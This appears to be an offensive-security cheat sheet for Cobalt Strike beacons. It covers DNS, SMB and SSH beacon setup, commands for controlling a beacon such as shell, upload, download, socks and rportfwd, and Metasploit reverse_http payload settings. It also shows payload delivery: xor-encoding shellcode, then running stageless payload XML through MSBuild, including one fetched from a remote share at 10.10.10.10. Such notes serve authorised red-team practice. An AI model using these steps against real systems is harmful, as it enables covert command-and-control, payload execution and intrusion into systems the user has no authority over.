Cobalt Strike - Beacons
DNS Beacon
DNS Configuration
- Edit the
Zone File
for the domain - Create an
A record
for Cobalt Strike system - Create an
NS record
that points to FQDN of your Cobalt Strike system
Your Cobalt Strike team server system must be authoritative for the domains you specify. Create a DNS A
record and point it to your Cobalt Strike team server. Use DNS NS
records to delegate several domains or sub-domains to your Cobalt Strike team server's A
record.
Example of DNS on Digital Ocean:
NS example.com directs to 10.10.10.10. 86400
NS polling.campaigns.example.com directs to campaigns.example.com. 3600
A campaigns.example.com directs to 10.10.10.10 3600
After creating a DNS listener (Beacon DNS
), verify that your domains resolve to 0.0.0.0
nslookup jibberish.beacon polling.campaigns.domain.com
nslookup jibberish.beacon campaigns.domain.com
If you have trouble with DNS, you can restart the systemd
service and force Google DNS nameservers.
systemctl disable systemd-resolved
systemctl stop systemd-resolved
rm /etc/resolv.conf
echo "nameserver 8.8.8.8" > /etc/resolv.conf
echo "nameserver 8.8.4.4" >> /etc/resolv.conf
DNS Redirector
Debug the DNS queries with tcpdump -l -n -s 5655 -i eth0 udp port 53
.
DNS Mode
Mode | Description |
---|---|
mode dns-txt |
DNS TXT record data channel (default) |
mode dns |
DNS A record data channel |
mode dns6 |
DNS AAAA record channel |
SMB Beacon
SMB Beacon uses Named Pipes. You might encounter these error code while running it.
Error Code | Meaning | Description |
---|---|---|
2 | File Not Found | There is no beacon for you to link to |
5 | Access is denied | Invalid credentials or you don't have permission |
53 | Bad Netpath | You have no trust relationship with the target system. It may or may not be a beacon there. |
SSH Beacon
# deploy a beacon
beacon> help ssh
Use: ssh [target:port] [user] [pass]
Spawn an SSH client and attempt to login to the specified target
beacon> help ssh-key
Use: ssh [target:port] [user] [/path/to/key.pem]
Spawn an SSH client and attempt to login to the specified target
# beacon's commands
upload Upload a file
download Download a file
socks Start SOCKS4a server to relay traffic
sudo Run a command via sudo
rportfwd Setup a reverse port forward
shell Execute a command via the shell
Metasploit compatibility
- Payload:
windows/meterpreter/reverse_http or windows/meterpreter/reverse_https
- Set
LHOST
andLPORT
to the beacon - Set
DisablePayloadHandler
toTrue
- Set
PrependMigrate
toTrue
exploit -j
Custom Payloads
* Attacks > Packages > Payload Generator
* Attacks > Packages > Scripted Web Delivery (S)
$ python2 ./shellcode_encoder.py -cpp -cs -py payload.bin MySecretPassword xor
$ C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Temp\dns_raw_stageless_x64.xml
$ %windir%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe \\10.10.10.10\Shared\dns_raw_stageless_x86.xml